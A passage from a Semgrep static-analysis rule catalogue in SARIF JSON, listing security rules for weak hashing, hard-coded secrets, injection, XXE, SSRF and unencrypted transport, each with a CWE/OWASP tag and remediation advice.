This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","id":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","name":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash","id":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","name":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.passlib.passlib-insecure-hash.passlib-insecure-hash"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"help":{"markdown":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket","id":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","name":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.unencrypted-socket.unencrypted-socket"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"help":{"markdown":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption)\n - [https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22](https://ali-akhtar.medium.com/realm-custom-configuration-and-encryption-realmswift-part-3-f991f090ae22)\n - [https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/](https://mas.owasp.org/MASVS/controls/MASVS-STORAGE-1/)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/](https://mas.owasp.org/MASVS/controls/MASVS-CRYPTO-1/)\n","text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the configuration, no encryption is used. To protect user and application data, the application should specify an encryption key, which is randomly generated per user, per client."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","id":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","name":"swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.realmstate-encryption-missing.swift-hardcoded-realm-without-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","id":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","name":"javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.hardcoded.tokens.hardcoded-github-pat.hardcoded-github-pat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.db.pg-express.pg-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/javascript.express.db.pg-express.pg-express","id":"javascript.express.db.pg-express.pg-express","name":"javascript.express.db.pg-express.pg-express","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.db.pg-express.pg-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped. Ensure data passed to an LDAP query is not controllable or properly sanitize the user input with functions like createEqualityFilter."},"helpUri":"https://semgrep.dev/r/java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","id":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","name":"java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.tainted-ldapi-from-http-request-deepsemgrep.tainted-ldapi-from-http-request-deepsemgrep"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request)\n - [https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html](https://docs.ruby-lang.org/en/2.2.0/Net/Telnet.html)\n - [https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet](https://www.rubydoc.info/gems/net-ssh-telnet2/0.1.0/Net/SSH/Telnet)\n","text":"Checks for creation of telnet servers or attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","id":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","name":"problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.ruby-stdlib.net-telnet-request.net-telnet-request"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"help":{"markdown":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected a request using 'http://'. This request will be unencrypted. Use 'https://' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context","id":"python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context","name":"python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.insecure-transport.requests.request-session-http-in-with-context.request-session-http-in-with-context"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Consuming CDNs without including a SubResource Integrity (SRI) can expose your application and its users to compromised code. SRIs allow you to consume specific versions of content where if even a single byte is compromised, the resource will not be loaded. Add an integrity attribute to your ` is not properly encoded."},"help":{"markdown":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Unencoded JSON in HTML context is vulnerable to cross-site scripting, because `` is not properly encoded."},"helpUri":"https://semgrep.dev/r/csharp.razor.security.html-raw-json.html-raw-json","id":"csharp.razor.security.html-raw-json.html-raw-json","name":"csharp.razor.security.html-raw-json.html-raw-json","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.razor.security.html-raw-json.html-raw-json"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret","id":"python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret","name":"python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe)\n - [https://github.com/astro/node-expat](https://github.com/astro/node-expat)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe","id":"javascript.express.security.express-expat-xxe.express-expat-xxe","name":"javascript.express.security.express-expat-xxe.express-expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-expat-xxe.express-expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"help":{"markdown":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request)\n - [https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection](https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection)\n","text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","id":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","name":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"help":{"markdown":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.distributed.security.require-encryption)\n - [https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters](https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters)\n","text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"helpUri":"https://semgrep.dev/r/python.distributed.security.require-encryption","id":"python.distributed.security.require-encryption","name":"python.distributed.security.require-encryption","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.distributed.security.require-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"help":{"markdown":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression)\n - [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!)\n","text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","id":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","name":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","id":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","name":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"help":{"markdown":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall","id":"ruby.lang.security.dangerous-syscall.dangerous-syscall","name":"ruby.lang.security.dangerous-syscall.dangerous-syscall","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-syscall.dangerous-syscall"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","id":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","name":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"help":{"markdown":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","id":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","name":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module 